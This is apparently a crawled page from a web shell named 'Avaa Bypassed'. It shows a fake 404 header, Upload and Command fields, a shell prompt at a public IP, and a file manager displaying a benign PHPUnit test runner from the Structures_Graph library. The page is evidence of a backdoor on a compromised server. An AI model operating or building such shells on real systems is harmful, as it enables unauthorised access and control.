404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.118.138.113: ~ $
<?php
require_once dirname(__FILE__) . '/helper.inc';

class Structures_Graph_AllTests
{
    public static function main()
    {
        PHPUnit_TextUI_TestRunner::run(self::suite());
    }

    public static function suite()
    {
        $suite = new PHPUnit_Framework_TestSuite('Structures_Graph Tests');

        $dir = new GlobIterator(dirname(__FILE__) . '/*Test.php');
        $suite->addTestFiles($dir);

        return $suite;
    }
}

Filemanager

Name Type Size Permission Actions
AcyclicTestTest.php File 1.28 KB 0644
AllTests.php File 444 B 0644
BasicGraphTest.php File 8.85 KB 0644
TopologicalSorterTest.php File 1.83 KB 0644
helper.inc File 361 B 0644